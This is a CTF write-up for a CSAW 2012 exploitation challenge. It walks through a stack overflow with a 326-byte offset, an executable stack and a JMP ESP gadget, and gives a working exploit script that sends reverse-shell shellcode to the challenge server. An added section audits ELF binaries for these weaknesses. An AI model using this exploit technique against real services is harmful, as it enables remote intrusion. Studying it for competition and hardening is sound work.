Sunday, September 30, 2012

CSAW CTF Quals: Exploitation 300

This one was interesting because it was all in Chinese (according to Google Translate). So we set up the binary on a local machine and got cracking. We ran some of the strings of Chinese through Google Translate and got the string "This part is not difficult, but I hope you have fun. If you give me a large amount of data, it may be a bad thing will happen." So we sent it a lot of stuff. And it broke.

We attached to the process with gdb and sent the program a pattern so we could figure out the offset of the return address we were overwriting, which turned out to be 326 bytes. Now to figure out what to return to.

Turns out that the stack was executable and there was a convenient 'JMP ESP' sittin' around at address 0x08048F47, so we overwrote the return address with the address of that JMP ESP and then popped in some nice reverse_tcp shellcode and won! Our win.py is posted below.
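
# win.py (Python 2)
import socket, binascii

# For our pattern generator
#alph = 'abcefghijklmnopqrstuvwxyz'

# Print whatever the service sends back
def recv(s):
    print s.recv(1024)

# Reverse the byte order of an 8-digit hex string (big-endian -> little-endian)
def endian(s):
    if len(s) < 8:
        s = s.zfill(8)
    return s[6:8]+s[4:6]+s[2:4]+s[0:2]

s = socket.socket()
s.connect(('128.238.66.218', 4842))

recv(s)
# 326 bytes of padding up to the saved return address
win = 'a'*326
# Overwrite the return address with the address of the JMP ESP
win += binascii.unhexlify(endian('08048f47'))
# Shellcode is read from a local file named 'payload'
win += open('payload').read()+'\n'

# A simple pattern generator
#for i in alph:
#    for j in range(0,10):
#        breaker += i + str(j)

print win, len(win)
s.sendall(win)
recv(s)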


  -- suntzu_II
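
The two conditions this exploit relied on, an executable stack and a JMP ESP at a fixed address, are both recorded in the binary's ELF headers. The following is an added example, not part of the original post: a Python 3 check that reads the PT_GNU_STACK flags and e_type. The names audit_elf and sample_elf32 are invented here, and the sample images are constructed.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header that records stack permissions
PF_X = 0x1                 # "executable" bit in p_flags
ET_EXEC = 2                # non-PIE: image loads at a fixed address

def audit_elf(data):
    """Return (exec_stack, fixed_base) for a little-endian ELF image."""
    if data[:4] != b"\x7fELF" or data[5] != 1:
        raise ValueError("not a little-endian ELF file")
    is64 = data[4] == 2
    # Only the fields needed here: e_type, e_phoff, e_phentsize, e_phnum.
    e_type = struct.unpack_from("<H", data, 16)[0]
    if is64:
        e_phoff = struct.unpack_from("<Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    else:
        e_phoff = struct.unpack_from("<I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    # Assumption: a missing PT_GNU_STACK is treated as executable (conservative).
    exec_stack = True
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if struct.unpack_from("<I", data, off)[0] == PT_GNU_STACK:
            # p_flags is at offset 4 in Elf64_Phdr and offset 24 in Elf32_Phdr.
            flags = struct.unpack_from("<I", data, off + (4 if is64 else 24))[0]
            exec_stack = bool(flags & PF_X)
    return exec_stack, e_type == ET_EXEC

def sample_elf32(e_type, stack_flags):
    """Constructed 84-byte ELF32 image: header plus one PT_GNU_STACK entry."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, e_type, 3, 1,
                       0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr

if __name__ == "__main__":
    # RWX stack + fixed base (the conditions in this writeup) vs. RW stack + PIE.
    for name, img in (("weak", sample_elf32(ET_EXEC, 0x7)),
                      ("hardened", sample_elf32(3, 0x6))):
        exec_stack, fixed_base = audit_elf(img)
        print(name, "exec_stack=%s fixed_base=%s" % (exec_stack, fixed_base))
```

A binary that reports exec_stack=False and fixed_base=False was linked with a non-executable stack and as PIE, which removes both the place to run injected shellcode and the constant gadget address.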
